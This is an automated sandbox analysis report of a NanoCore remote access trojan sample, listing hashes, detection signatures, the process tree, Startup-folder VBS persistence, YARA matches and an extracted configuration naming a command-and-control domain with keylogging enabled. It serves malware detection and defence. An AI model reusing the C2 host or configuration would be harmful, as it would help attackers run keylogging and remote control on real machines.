Windows Analysis Report
692BB93169319EBA2F556174D781A8636D610A67E6838.exe

Overview

General Information

Sample Name: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
Analysis ID: 629870
MD5: a93162e62b49a591e0d481e030ffc9ea
SHA1: b0c48a0fc418977051bea837c16aa7928f654da7
SHA256: 692bb93169319eba2f556174d781a8636d610a67e6838e19300a8a2454cd8b2b
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • 692BB93169319EBA2F556174D781A8636D610A67E6838.exe (PID: 5844 cmdline: "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" MD5: A93162E62B49A591E0D481E030FFC9EA)
    • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • wscript.exe (PID: 2208 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ople.exe.exe (PID: 1796 cmdline: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe MD5: CA51A0A9E3EF192B26D9818DC4EC5FF0)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • RegAsm.exe (PID: 1428 cmdline: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "3b5167aa-3858-4f80-81dc-688e9982", "Group": "AtikuVSDino", "Domain1": "dinolachy.duckdns.org", "Domain2": "127.0.0.1", "Port": 5626, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source | Rule | Description | Author | Strings

0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost

Source | Rule | Description | Author | Strings

3.2.RegAsm.exe.56a4629.7.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xb184:$x1: NanoCore.ClientPluginHost
  • 0xb1b1:$x2: IClientNetworkHost
3.2.RegAsm.exe.56a4629.7.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xb184:$x2: NanoCore.ClientPluginHost
  • 0xc25f:$s4: PipeCreated
  • 0xb19e:$s5: IClientLoggingHost
3.2.RegAsm.exe.56a4629.7.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
3.2.RegAsm.exe.56a4629.7.raw.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
  • 0xb14f:$x2: NanoCore.ClientPlugin
  • 0xb184:$x3: NanoCore.ClientPluginHost
  • 0xb143:$i2: IClientData
  • 0xb165:$i3: IClientNetwork
  • 0xb174:$i5: IClientDataHost
  • 0xb19e:$i6: IClientLoggingHost
  • 0xb1b1:$i7: IClientNetworkHost
  • 0xb1c4:$i8: IClientUIHost
  • 0xb1d2:$i9: IClientNameObjectCollection
  • 0xb1ee:$i10: IClientReadOnlyNameObjectCollection
  • 0xaf41:$s1: ClientPlugin
  • 0xb158:$s1: ClientPlugin
  • 0x10179:$s6: get_ClientSettings
12.2.RegAsm.exe.2ffb670.1.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost

AV Detection

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe, ProcessId: 5844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 5596, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

No Snort rule has matched

AV Detection

Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "3b5167aa-3858-4f80-81dc-688e9982", "Group": "AtikuVSDino", "Domain1": "dinolachy.duckdns.org", "Domain2": "127.0.0.1", "Port": 5626, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Virustotal: Detection: 72%
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Metadefender: Detection: 41%
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe ReversingLabs: Detection: 73%
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Avira: detection malicious, Label: HEUR/AGEN.1213119
Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe ReversingLabs: Detection: 63%
Source: Yara match File source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Joe Sandbox ML: detected
Source: 3.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.2.RegAsm.exe.56a0000.6.unpack Avira: Label: TR/NanoCore.fadte
Source: 12.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Code function: 0_2_002651DA FindFirstFileExA, 0_2_002651DA
Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Code function: 7_2_00AB51DA FindFirstFileExA, 7_2_00AB51DA

Networking

Source: Malware configuration extractor URLs: dinolachy.duckdns.org
Source: Malware configuration extractor URLs: 127.0.0.1
Source: unknown DNS query: name: dinolachy.duckdns.org
Source: Joe Sandbox View ASN Name: WOWUS WOWUS
Source: Joe Sandbox View IP Address: 192.169.69.25 192.169.69.25
Source: unknown DNS traffic detected: queries for: dinolachy.duckdns.org
Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

System Summary

Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.2dc5cb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
